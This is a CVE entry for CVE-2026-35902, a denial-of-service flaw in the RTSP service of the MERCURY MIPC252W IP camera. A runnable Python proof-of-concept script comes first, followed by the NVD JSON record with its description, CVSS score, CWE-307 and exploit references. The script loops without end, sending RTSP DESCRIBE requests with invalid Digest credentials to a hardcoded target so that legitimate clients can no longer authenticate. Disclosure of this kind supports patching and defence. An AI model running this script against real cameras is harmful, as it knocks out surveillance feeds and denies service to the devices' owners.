CVE-2026-35902

import socket # Target configuration TARGET_IP = "192.168.1.100" TARGET_PORT = 554 def send_malicious_rtsp(): # Construct RTSP DESCRIBE request with invalid Digest Auth # This simulates an attacker sending bad credentials repeatedly payload = "DESCRIBE rtsp://{} RTSP/1.0\r\n".format(TARGET_IP) payload += "CSeq: 2\r\n" payload += "Authorization: Digest username=\"admin\", realm=\"IP Camera\", nonce=\"\", uri=\"\", response=\"invalid_hash_value\"\r\n" payload += "User-Agent: PoC-Client\r\n" payload += "\r\n" print("[+] Sending malicious RTSP packets to {}:{}...".format(TARGET_IP, TARGET_PORT)) try: while True: # Create socket to send packets s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) s.connect((TARGET_IP, TARGET_PORT)) s.send(payload.encode('utf-8')) # Close connection immediately to simulate rapid attempts s.close() print("[+] Packet sent. RTSP service should be unresponsive soon.") except KeyboardInterrupt: print("[-] Exploit stopped by user.") except Exception as e: print("[-] Error: {}".format(e)) if __name__ == "__main__": send_malicious_rtsp()

{"cve": {"id": "CVE-2026-35902", "sourceIdentifier": "[email protected]", "published": "2026-04-27T19:16:51.060", "lastModified": "2026-05-05T13:40:59.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RTSP service of MERCURY IP camera MIPC252W 1.0.5 Build 230306 has an issue handling failed Digest authentication attempts. By repeatedly sending RTSP requests with invalid authentication parameters, an unauthenticated attacker can cause the RTSP service to enter a persistent authentication failure state, preventing legitimate clients from authenticating and leading to a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:*", "matchCriteriaId": "61FE2E9E-C0F5-4F45-B4F4-10E05CEB0395"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:*", "matchCriteriaId": "5CBF3BC0-1845-4D38-BFD2-3B02219C1BD8"}]}]}], "references": [{"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_3th/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_3th/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}